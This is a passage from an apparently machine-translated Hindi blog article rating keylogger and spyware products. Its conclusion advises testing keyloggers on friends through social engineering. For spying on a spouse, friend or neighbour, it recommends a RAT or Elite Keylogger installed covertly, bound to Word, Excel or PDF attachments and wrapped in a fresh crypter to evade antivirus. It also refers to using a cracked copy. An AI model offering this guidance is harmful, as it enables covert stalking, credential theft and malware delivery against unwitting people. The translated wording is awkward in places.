कार्यक्षमता पिछले उम्मीदवार के स्तर पर है, लेकिन गोपनीयता के साथ वही समस्याएँ हैं। इसके अलावा, कार्यक्षमता में एक दिलचस्प चीज़ शामिल है: कंप्यूटर में डाली गई यूएसबी ड्राइव से फ़ाइलों की प्रतिलिपि बनाना, साथ ही स्पाइरिक्स वेबसाइट पर एक वेब खाते के माध्यम से लॉग को दूरस्थ रूप से देखना (लेकिन हम एक फटा हुआ संस्करण डाउनलोड करने जा रहे हैं, इसलिए ऐसा नहीं होगा) हमारे लिए काम करें)।

5. स्पाइरिक्स पर्सनल मॉनिटर।

रेटिंग (10 में से):

  • गुप्त: 3
  • सुविधा/प्रयोज्यता: 6
  • कार्यक्षमता: 8

मैं इसका विस्तार से वर्णन नहीं करूंगा, क्योंकि... इस उदाहरण में ऐसा कुछ भी नहीं है जो पिछले जासूसों में से एक के पास नहीं था, हालाँकि, किसी को यह कीलॉगर पसंद आ सकता है (कम से कम इसके इंटरफ़ेस के लिए)।

हमारा अंत क्या होगा?

कीलॉगर का उपयोग करने का मुद्दा तकनीकी से अधिक नैतिक है, और यह काफी हद तक आपके लक्ष्यों पर निर्भर करता है।

यदि आप एक नियोक्ता हैं जो अपने कर्मचारियों को नियंत्रित करना चाहते हैं, तो बेझिझक स्टाफकॉप स्थापित करें, ऐसे कार्यों के लिए सभी कर्मचारियों से लिखित अनुमति लें (अन्यथा आपसे ऐसी चीजों के लिए गंभीर शुल्क लिया जा सकता है) और नौकरी आपकी झोली में है। हालाँकि मैं व्यक्तिगत रूप से अपने कर्मचारियों के प्रदर्शन को बढ़ाने के अधिक प्रभावी तरीके जानता हूँ।

यदि आप एक नौसिखिया आईटी विशेषज्ञ हैं जो केवल यह अनुभव करना चाहते हैं कि किसी को तोड़ना कैसा होता है - और यह चीज़ सामान्य रूप से कैसे काम करती है, तो अपने आप को सोशल इंजीनियरिंग विधियों से लैस करें और दिए गए किसी भी उदाहरण का उपयोग करके अपने दोस्तों पर परीक्षण करें। हालाँकि, याद रखें: पीड़ितों द्वारा ऐसी गतिविधि का पता लगाना दोस्ती और दीर्घायु में योगदान नहीं देता है। ;) और आपको निश्चित रूप से अपने कार्यस्थल पर इसका परीक्षण नहीं करना चाहिए। मेरे शब्दों को चिह्नित करें: मुझे इसका अनुभव है। ;)

यदि आपका लक्ष्य अपने दोस्त, पति, पड़ोसी की जासूसी करना है, या शायद आप इसे नियमित रूप से और पैसे के लिए भी करते हैं, तो ध्यान से सोचें कि क्या यह इसके लायक है। आख़िरकार, देर-सबेर वे आकर्षित हो सकते हैं। और यह इसके लायक नहीं है: "किसी और के गंदे कपड़े धोना कोई सुखद आनंद नहीं है।" यदि आपको अभी भी इसकी आवश्यकता है (या शायद आप कंप्यूटर अपराधों की जांच के क्षेत्र में काम करते हैं और ऐसे कार्य आपकी पेशेवर जिम्मेदारियों का हिस्सा हैं), तो केवल दो विकल्प हैं: चूहा! और एलीट कीलॉगर। छिपे हुए इंस्टॉलेशन वितरण के मोड में, वर्ड/एक्सेल/पीडीएफ से चिपका हुआ। और यदि संभव हो तो इसे ताज़ा क्रिप्टोर के साथ एन्क्रिप्ट करना बेहतर है। केवल इस मामले में ही हम सुरक्षित गतिविधियों और वास्तविक सफलता की गारंटी दे सकते हैं।

लेकिन किसी भी मामले में, यह याद रखने योग्य है कि कीलॉगर्स का सक्षम उपयोग लक्ष्य प्राप्त करने में केवल एक छोटी सी कड़ी है (एक साधारण हमले सहित)। आपके पास हमेशा व्यवस्थापक अधिकार नहीं होते हैं, आपके पास हमेशा भौतिक पहुंच नहीं होती है, और सभी उपयोगकर्ता आपके अनुलग्नकों/लिंक को नहीं खोलेंगे, पढ़ेंगे और यहां तक ​​कि डाउनलोड भी नहीं करेंगे (हैलो सोशल इंजीनियरिंग), एंटीवायरस हमेशा अक्षम नहीं होगा /आपका कीलॉगर/क्रिप्टर उनके लिए हमेशा अज्ञात नहीं रहेगा। इन सभी और कई अनकही समस्याओं का समाधान किया जा सकता है, लेकिन उनका समाधान अलग-अलग लेखों की एक पूरी श्रृंखला का विषय है।

संक्षेप में, आपने अभी-अभी सूचना सुरक्षा की जटिल, खतरनाक, लेकिन अविश्वसनीय रूप से दिलचस्प दुनिया में उतरना शुरू किया है। :)

ईमानदारी से,लिस्याक ए.एस.

विषय जारी रखें:
कार्यालय

जब आप एक नया स्मार्टफोन खरीदते हैं, तो आप शायद अपने संपर्कों, डेटा और एप्लिकेशन को अपने पुराने डिवाइस से उसमें स्थानांतरित करना चाहेंगे। आप भी कॉपी कर सकते हैं...

नये लेख
/
लोकप्रिय